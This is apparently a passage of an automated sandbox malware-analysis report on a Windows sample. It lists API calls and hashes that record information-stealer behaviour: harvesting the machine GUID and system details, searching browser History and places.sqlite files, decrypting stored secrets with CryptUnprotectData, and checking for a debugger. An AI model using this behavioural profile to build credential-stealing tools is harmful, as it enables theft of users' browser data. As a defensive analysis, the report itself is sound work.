              • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: String$AllocFreeOpenQueryValue
              • String ID:
              • API String ID: 967375698-0
              • Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
              • Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
              • Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
              • Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5
              APIs
                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
              • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
              • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: String$AllocFreeOpenQueryValue
              • String ID:
              • API String ID: 967375698-0
              • Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
              • Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
              • Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
              • Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5
              APIs
              • SetErrorMode.KERNEL32(00000400), ref: 00785856
              • SetErrorMode.KERNEL32(00000000), ref: 0078585B
              Memory Dump Source
              • Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
              • Instruction ID: 84555313a3c31899c90153882680c87f0a272c1581caef67196d0cf2e76c0b39
              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
              • Instruction Fuzzy Hash: F9D0123118522877D7002A95DC0DBCD7B5CDF05B63F048021FB0DD9080C774994047E5
              APIs
              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: Virtual$AllocFree
              • String ID:
              • API String ID: 2087232378-0
              • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
              • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
              • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
              • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: dbb718cec77b63f2c87692c5cf3c11fae30828a8f60476d1a53ae7f6434210d1
              • Instruction ID: 8463d9e6b5eb0fc51597dd317ed7278ab274739b09b443174cbf26f1e383fc68
              • Opcode Fuzzy Hash: dbb718cec77b63f2c87692c5cf3c11fae30828a8f60476d1a53ae7f6434210d1
              • Instruction Fuzzy Hash: 11212B75941229CFEB60DF68CD94F98B7B1BB09314F0485E6E60DAB251D634AE84DF20
              APIs
              • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: NameUser
              • String ID:
              • API String ID: 2645101109-0
              • Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
              • Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
              • Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
              • Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57
              APIs
              • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: NameUser
              • String ID:
              • API String ID: 2645101109-0
              • Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
              • Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
              • Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
              • Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57
              APIs
              • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide
              • String ID:
              • API String ID: 626452242-0
              • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
              • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
              • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
              • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
              APIs
              • VirtualProtect.KERNEL32(00000040,?), ref: 00421AD7
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: ProtectVirtual
              • String ID:
              • API String ID: 544645111-0
              • Opcode ID: 19771ce88e7a3992dc5f04f66db4136d51769723e0a9caa8c6ec8de04c0ecc5c
              • Instruction ID: 1623b29cf8142295aa0f5df72f69ac979d577d88d800b5c0b7e759b5a6e1f0e4
              • Opcode Fuzzy Hash: 19771ce88e7a3992dc5f04f66db4136d51769723e0a9caa8c6ec8de04c0ecc5c
              • Instruction Fuzzy Hash: 70C08CB180010CBBDB019B82ED07E6A3BACE304605F0000B0B702A50B1D6B2F900AB6E
              APIs
              • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FreeVirtual
              • String ID:
              • API String ID: 1263568516-0
              • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
              • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
              • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
              • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
              APIs
              • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FreeVirtual
              • String ID:
              • API String ID: 1263568516-0
              • Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
              • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
              • Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
              • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FreeString$FileFindFirst
              • String ID: .LNK$._.$0_@$LLA$CA
              • API String ID: 1653790112-882170572
              • Opcode ID: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
              • Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
              • Opcode Fuzzy Hash: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
              • Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59
              APIs
              • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FreeString$InfoSystem
              • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
              • API String ID: 4070941872-1038824218
              • Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
              • Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
              • Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
              • Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59
              APIs
                • Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
                • Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5
              • GetCommandLineA.KERNEL32 ref: 00404C7B
              • GetVersion.KERNEL32 ref: 00404C8F
              • GetVersion.KERNEL32 ref: 00404CA0
              • GetCurrentThreadId.KERNEL32 ref: 00404CDC
                • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
              • GetThreadLocale.KERNEL32 ref: 00404CBC
                • Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
              • String ID: %u
              • API String ID: 3734044017-749584840
              • Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
              • Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
              • Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
              • Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FileFindFirst
              • String ID: .txt$\*.*$\History
              • API String ID: 1974802433-2232271174
              • Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
              • Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
              • Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
              • Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FileFindFirst
              • String ID: .txt$\*.*$\History
              • API String ID: 1974802433-2232271174
              • Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
              • Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
              • Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
              • Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FileFindFirst
              • String ID: .txt$\*.*$\places.sqlite
              • API String ID: 1974802433-3919338718
              • Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
              • Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
              • Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
              • Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F
                • Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
                • Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
              • FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
              • FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
              • String ID: .txt$\*.*
              • API String ID: 4269597168-2615687548
              • Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
              • Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
              • Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
              • Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
              • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
              • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: Find$File$CloseFirstFreeNextString
              • String ID: .txt$\*.*
              • API String ID: 2008072091-2615687548
              • Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
              • Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
              • Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
              • Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
              • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
              • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: Find$File$CloseFirstFreeNextString
              • String ID: .txt$\*.*
              • API String ID: 2008072091-2615687548
              • Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
              • Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
              • Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
              • Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 0042E5EC
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042E601
              • UnhandledExceptionFilter.KERNEL32(0043E074), ref: 0042E60C
              • GetCurrentProcess.KERNEL32(C0000409), ref: 0042E628
              • TerminateProcess.KERNEL32(00000000), ref: 0042E62F
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
              • String ID:
              • API String ID: 2579439406-0
              • Opcode ID: 1b1fb8fedfc132813969b2cdb8563504d8e7accad777ca195f64e338567e2f38
              • Instruction ID: 790a93e72bbb84f86c58466f59cbf802cb39443fe5ac6c9110d3c63b658b15fc
              • Opcode Fuzzy Hash: 1b1fb8fedfc132813969b2cdb8563504d8e7accad777ca195f64e338567e2f38
              • Instruction Fuzzy Hash: EA21EFB49013959FD701EF65F8C5A663BE8FB48300F50617AE9088A772E7B499818F8D
              APIs
              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00433057,?,00431D9C,?,000000BC,?), ref: 00432A2D
              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00433057,?,00431D9C,?,000000BC,?), ref: 00432A56
              • GetACP.KERNEL32(?,?,00433057,?,00431D9C,?,000000BC,?), ref: 00432A6A
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: 5d6b43e06ac48eaeab5c3bf4c99f1008fec33a8f7a107cd015efc394a80a7018
              • Instruction ID: f7b9df3e716033b58a90cc7d58479ceaa044b8ba0b495ae67d7571d083caf008
              • Opcode Fuzzy Hash: 5d6b43e06ac48eaeab5c3bf4c99f1008fec33a8f7a107cd015efc394a80a7018
              • Instruction Fuzzy Hash: F401D431A04706BFEB31EB64FE05B5F36A8AF08758F20102AF501E1192DBB8DE41965D
              APIs
              • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
              • LocalFree.KERNEL32(?), ref: 0040950A
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CryptDataFreeLocalUnprotect
              • String ID:
              • API String ID: 1561624719-0
              • Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
              • Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
              • Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
              • Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A
              APIs
              • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
              • Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
              • Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
              • Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698
              APIs
              • CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040A4CC,00000000,?,00000000,0040A52D,0041A69E), ref: 0040A4BC
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CreateInstance
              • String ID:
              • API String ID: 542301482-0
              • Opcode ID: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
              • Instruction ID: ecfa08d63a5e99a02bf1f10941cb6c6ba3816feefb3116676bc77a3be9f2b9a2
              • Opcode Fuzzy Hash: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
              • Instruction Fuzzy Hash: E5C002953917243AE551B2AA2CCAF5B418C4B88B59F214177B618F61D2A5E85C2001AE
              APIs
              • EnumSystemLocalesA.KERNEL32(Function_00011AE3,00000001), ref: 00432E91
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: EnumLocalesSystem
              • String ID:
              • API String ID: 2099609381-0
              • Opcode ID: 00c636353725f1962da484686480a063960c14c5634d80fee5c6b3dbfcf7b5c1
              • Instruction ID: edf693aabfade6f8986dd0796972b5e46aa2203ada5e98ed6e0c7391be26afeb
              • Opcode Fuzzy Hash: 00c636353725f1962da484686480a063960c14c5634d80fee5c6b3dbfcf7b5c1
              • Instruction Fuzzy Hash: 5DD05E709157408BEB204F31DA493A1BBA0EB10F25F209A9DD982485C1C3F9A48AC704
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_00006C5F), ref: 00427CA6
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: f3d3d353f5460e81a2df8597d45737ef6fda4a7224c0e88d4ab7bb144127112c
              • Instruction ID: 69a14b63a2d67a8f2144ce57787bd3d3149b0dda3096d2bfa3bbaf2fdc6b73d2
